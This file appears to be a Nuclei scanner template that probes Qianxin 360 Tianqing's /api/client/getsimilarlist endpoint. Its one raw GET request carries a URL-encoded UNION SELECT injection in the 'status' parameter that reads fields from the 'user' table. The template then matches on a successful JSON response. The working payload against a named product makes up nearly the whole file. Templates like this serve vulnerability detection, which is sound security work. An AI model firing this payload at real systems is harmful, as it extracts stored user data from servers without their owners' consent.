id: qianxin-360-tianqing-getsimilarlist-sqli-rce

info:
  name: qianxin-360-tianqing-getsimilarlist-sqli-rce
  author: xxxx
  severity: high
  tags: qianxin
  description: qianxin-360-tianqing-getsimilarlist-sqli-rce

http:
  - raw:
      - |
        GET /api/client/getsimilarlist?status[0,1%29+union+all+select+%28%2F%2A%2150000select%2A%2F+79787337%29%2C+setting%2C+setting%2C+status%2C+name%2C+create_time+from+%22user%22+where+1+in+%281]=1&status[0]=1 HTTP/1.1
        Host:

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      
      - type: word
        words: 
          - "list"
          - "total"
          - "reason\":\"success"
        part: body 
        condition: and
              
      - type: word
        part: header
        words: 
          - "application/json" 
